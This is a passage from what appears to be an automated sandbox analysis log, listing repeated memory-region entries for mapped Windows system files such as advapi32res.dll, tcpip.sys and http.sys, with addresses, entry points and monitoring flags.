= 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3094 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3095 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3096 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3097 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3098 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3099 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3100 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3101 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3102 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3103 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3104 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3105 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3106 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3107 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3108 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3109 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3110 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3111 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3112 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3113 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3114 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3115 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3116 start_va = 0x5a0000 end_va = 0x5affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mrxsmb.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\mrxsmb.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\mrxsmb.sys.mui") Region: id = 3117 start_va = 0xd10000 end_va = 0xd81fff monitored = 0 entry_point = 0xd67000 region_type = mapped_file name = "mrxsmb.sys" filename = "\\Windows\\System32\\drivers\\mrxsmb.sys" (normalized: "c:\\windows\\system32\\drivers\\mrxsmb.sys") Region: id = 3118 start_va = 0x5a0000 end_va = 0x5affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mrxsmb.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\mrxsmb.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\mrxsmb.sys.mui") Region: id = 3119 start_va = 0xd10000 end_va = 0xd81fff monitored = 0 entry_point = 0xd67000 region_type = mapped_file name = "mrxsmb.sys" filename = "\\Windows\\System32\\drivers\\mrxsmb.sys" (normalized: "c:\\windows\\system32\\drivers\\mrxsmb.sys") Region: id = 3120 start_va = 0x5a0000 end_va = 0x5b5fff monitored = 0 entry_point = 0x5b0420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 3121 start_va = 0x5c0000 end_va = 0x5c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 3122 start_va = 0x5a0000 end_va = 0x5b5fff monitored = 0 entry_point = 0x5b0420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 3123 start_va = 0x5c0000 end_va = 0x5c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 3124 start_va = 0x5a0000 end_va = 0x5b5fff monitored = 0 entry_point = 0x5b0420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 3125 start_va = 0x5c0000 end_va = 0x5c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 3126 start_va = 0x5a0000 end_va = 0x5b5fff monitored = 0 entry_point = 0x5b0420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 3127 start_va = 0x5c0000 end_va = 0x5c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 3128 start_va = 0x5a0000 end_va = 0x5b9fff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3129 start_va = 0x5c0000 end_va = 0x5c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3130 start_va = 0x5a0000 end_va = 0x5b9fff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3131 start_va = 0x5c0000 end_va = 0x5c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3132 start_va = 0x5a0000 end_va = 0x5cafff monitored = 0 entry_point = 0x5bd000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3133 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3134 start_va = 0x5a0000 end_va = 0x5cafff monitored = 0 entry_point = 0x5bd000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3135 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3136 start_va = 0x5a0000 end_va = 0x5cafff monitored = 0 entry_point = 0x5bd000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3137 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3138 start_va = 0x5a0000 end_va = 0x5cafff monitored = 0 entry_point = 0x5bd000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3139 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3140 start_va = 0x5a0000 end_va = 0x5c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3141 start_va = 0x1ad0000 end_va = 0x1bb3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3142 start_va = 0x5a0000 end_va = 0x5c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3143 start_va = 0x1ad0000 end_va = 0x1bb3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3144 start_va = 0x5a0000 end_va = 0x5a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "afd.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\afd.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\afd.sys.mui") Region: id = 3145 start_va = 0x1610000 end_va = 0x16a2fff monitored = 0 entry_point = 0x1689000 region_type = mapped_file name = "afd.sys" filename = "\\Windows\\System32\\drivers\\afd.sys" (normalized: "c:\\windows\\system32\\drivers\\afd.sys") Region: id = 3146 start_va = 0x5a0000 end_va = 0x5a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "afd.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\afd.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\afd.sys.mui") Region: id = 3147 start_va = 0x1610000 end_va = 0x16a2fff monitored = 0 entry_point = 0x1689000 region_type = mapped_file name = "afd.sys" filename = "\\Windows\\System32\\drivers\\afd.sys" (normalized: "c:\\windows\\system32\\drivers\\afd.sys") Region: id = 3148 start_va = 0x5a0000 end_va = 0x5a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fvevol.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\fvevol.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\fvevol.sys.mui") Region: id = 3149 start_va = 0x1610000 end_va = 0x16b0fff monitored = 0 entry_point = 0x16a3000 region_type = mapped_file name = "fvevol.sys" filename = "\\Windows\\System32\\drivers\\fvevol.sys" (normalized: "c:\\windows\\system32\\drivers\\fvevol.sys") Region: id = 3150 start_va = 0x5a0000 end_va = 0x5a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fvevol.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\fvevol.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\fvevol.sys.mui") Region: id = 3151 start_va = 0x1610000 end_va = 0x16b0fff monitored = 0 entry_point = 0x16a3000 region_type = mapped_file name = "fvevol.sys" filename = "\\Windows\\System32\\drivers\\fvevol.sys" (normalized: "c:\\windows\\system32\\drivers\\fvevol.sys") Region: id = 3152 start_va = 0x5a0000 end_va = 0x5aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 3153 start_va = 0x1610000 end_va = 0x1695fff monitored = 0 entry_point = 0x1681000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 3154 start_va = 0x5a0000 end_va = 0x5aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 3155 start_va = 0x1610000 end_va = 0x1695fff monitored = 0 entry_point = 0x1681000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 3156 start_va = 0x5a0000 end_va = 0x5aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 3157 start_va = 0x1610000 end_va = 0x1695fff monitored = 0 entry_point = 0x1681000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 3158 start_va = 0x5a0000 end_va = 0x5aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 3159 start_va = 0x1610000 end_va = 0x1695fff monitored = 0 entry_point = 0x1681000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 3160 start_va = 0x5a0000 end_va = 0x5aefff monitored = 0 entry_point = 0x5a36e0 region_type = mapped_file name = "dmvsc.sys" filename = "\\Windows\\System32\\drivers\\dmvsc.sys" (normalized: "c:\\windows\\system32\\drivers\\dmvsc.sys") Region: id = 3161 start_va = 0x5b0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dmvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\dmvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\dmvsc.sys.mui") Region: id = 3162 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3163 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3164 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3165 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3166 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3167 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3168 start_va = 0x1ad0000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ad0000" filename = "" Region: id = 3169 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3170 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3171 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3172 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3173 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3174 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3175 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3176 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3177 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 3178 start_va = 0x1cd0000 end_va = 0x1ddefff monitored = 0 entry_point = 0x1d0c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 3179 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 3180 start_va = 0x1cd0000 end_va = 0x1ddefff monitored = 0 entry_point = 0x1d0c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 3181 start_va = 0x5a0000 end_va = 0x5b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tcpip.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\tcpip.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\tcpip.sys.mui") Region: id = 3182 start_va = 0x1cd0000 end_va = 0x1f26fff monitored = 0 entry_point = 0x1edce10 region_type = mapped_file name = "tcpip.sys" filename = "\\Windows\\System32\\drivers\\tcpip.sys" (normalized: "c:\\windows\\system32\\drivers\\tcpip.sys") Region: id = 3183 start_va = 0x5a0000 end_va = 0x5b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tcpip.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\tcpip.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\tcpip.sys.mui") Region: id = 3184 start_va = 0x1cd0000 end_va = 0x1f26fff monitored = 0 entry_point = 0x1edce10 region_type = mapped_file name = "tcpip.sys" filename = "\\Windows\\System32\\drivers\\tcpip.sys" (normalized: "c:\\windows\\system32\\drivers\\tcpip.sys") Region: id = 3185 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 3186 start_va = 0x1cd0000 end_va = 0x1de0fff monitored = 0 entry_point = 0x1dc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 3187 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 3188 start_va = 0x1cd0000 end_va = 0x1de0fff monitored = 0 entry_point = 0x1dc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 3189 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 3190 start_va = 0x1cd0000 end_va = 0x1de0fff monitored = 0 entry_point = 0x1dc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 3191 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 3192 start_va = 0x1cd0000 end_va = 0x1de0fff monitored = 0 entry_point = 0x1dc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 3193 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 3194 start_va = 0x1cd0000 end_va = 0x1de0fff monitored = 0 entry_point = 0x1dc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 3195 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: 